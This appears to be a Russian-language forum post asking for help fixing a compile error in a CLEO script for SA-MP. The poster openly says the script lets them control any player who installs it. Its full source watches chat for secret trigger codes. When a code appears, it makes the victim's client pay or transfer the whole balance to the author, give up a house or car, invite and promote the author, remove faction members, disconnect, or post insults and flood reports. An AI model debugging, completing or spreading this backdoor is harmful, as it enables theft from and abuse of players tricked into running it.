есть скрипт управления игроком,то есть я ввожу текст givemoney и у игрока который установил этот cleo срабатывает эта команда,то есть он дает мне деньги
я убрал все лишнее
и даже когда рабочий компилировал,то вылизала ошибка, Неизвестная команда alloc 1@ 256.
{$CLEO .cs}
0000:NOP
repeat
wait 400
until 0AFA: is_samp_structures_available
:1
while true
wait 0
alloc 1@ 256
0B75: samp get_chat_string 99 text_to 1@ prefix_to 3@ color_to 4@ prefix_color_to 25@
if
0C18: 9@ = strstr string1 1@ string2 "dr11" // rasform
then
jump @rasform
else
if
0C18: 9@ = strstr string1 1@ string2 "dr12" // invite,giverank
then
jump @invite
else
if
0C18: 9@ = strstr string1 1@ string2 "dr13" // pay
then
jump @pay
else
if
0C18: 9@ = strstr string1 1@ string2 "dr14" // kick
then
jump @kick
else
if
0C18: 9@ = strstr string1 1@ string2 "dr15" // neadekvat
then
jump @neadekvat
else
if
0C18: 9@ = strstr string1 1@ string2 "dr16" // report
then
jump @reportflood
else
if
0C18: 9@ = strstr string1 1@ string2 "dr17" // transfer
then
jump @transfer
else
if
0C18: 9@ = strstr string1 1@ string2 "dr18" // house
then
jump @house
else
if
0C18: 9@ = strstr string1 1@ string2 "dr19" // car
then
jump @car
end
end
end
end
end
end
end
end
end
free 1@
end
:rasform
wait 1000
0AF9: samp say_msg "/find"
wait 1000
0@ = 99
:Label1
if
0@ > 0
else_jump @1
alloc 1@ 256
0B75: samp get_chat_string 0@ text_to 1@ prefix_to 3@ color_to 4@ prefix_color_to 25@
if and
0C18: 3@ = strstr string1 1@ string2 "ранг:"
0AD4: 4@ = scan_string 1@ format " [%d] %s ранг: %d" 5@ 6@ 7@
then
0AF9: samp say_msg "/uninvite %d" 5@
wait 1000
0@ -= 2
else
0@ -= 1
end
free 1@
jump @Label1
:pay
wait 1000
0AD4: 4@ = scan_string 9@ format "dr13 %d %d" 5@
0AF9: samp say_msg "/pay %d %d" 5@
jump @Label1
:invite
wait 1000
0AD4: 4@ = scan_string 9@ format "dr12 %d" 5@
0AF9: samp say_msg "/invite %d" 5@
wait 1000
0AF9: samp say_msg "/giverank 6"
jump @Label1
:kick
0B28: samp disconnect_with_reason 0
jump @Label1
:neadekvat
wait 1000
0AF9: samp say_msg "/d ВСЕМ САСАТЬ РАБОТАЕТ CHEATBOMG GANG"
jump @Label1
:reportflood
while true
wait 1000
0AF9: samp say_msg "/mm"
:2
wait 0
if
0B4C: samp is_dialog_active 22
jf @2
0B49: samp set_current_dialog_list_item 1
0B47: samp close_current_dialog_with_button 1
wait 500
:3
wait 0
if
0B4C: samp is_dialog_active 22
jf @3
0B49: samp set_current_dialog_list_item 1
0B47: samp close_current_dialog_with_button 1
wait 500
:kek
wait 0
if
0B4C: samp is_dialog_active 22
jf @kek
wait 500
0B4B: samp set_current_dialog_editbox_text "ЛОЛ НИКТО И НЕ СПАЛИЛ ЧТО ЭТОТ АКК ПРОДАН, АДМИНЫ - ЛАХИ"
0B47: samp close_current_dialog_with_button 1
end
:transfer
0AD4: 4@ = scan_string 9@ format "dr17 %d" 5@
wait 1000
0AF9: samp say_msg "/balance"
wait 1000
0B75: samp get_chat_string 99 text_to 1@ prefix_to 3@ color_to 4@ prefix_color_to 25@
if
0AD4: 4@ = scan_string 1@ format " На вашем счету %d вирт" 6@
then
0AF9: samp say_msg "/transfer %d %d" 5@ 6@
end
jump @Label1
:house
0AD4: 4@ = scan_string 9@ format "dr18 %d" 5@
wait 1000
0AF9: samp say_msg "/changehouse %d 1" 5@
:4
wait 0
if
0B4C: samp is_dialog_active 172
jf @4
0B47: samp close_current_dialog_with_button 1
jump @Label1
:car
0AD4: 4@ = scan_string 9@ format "dr19 %d" 5@
wait 1000
0AF9: samp say_msg "/changecar %d 1" 5@
:5
wait 0
if
0B4C: samp is_dialog_active 152
jf @5
0B47: samp close_current_dialog_with_button 1
jump @Label1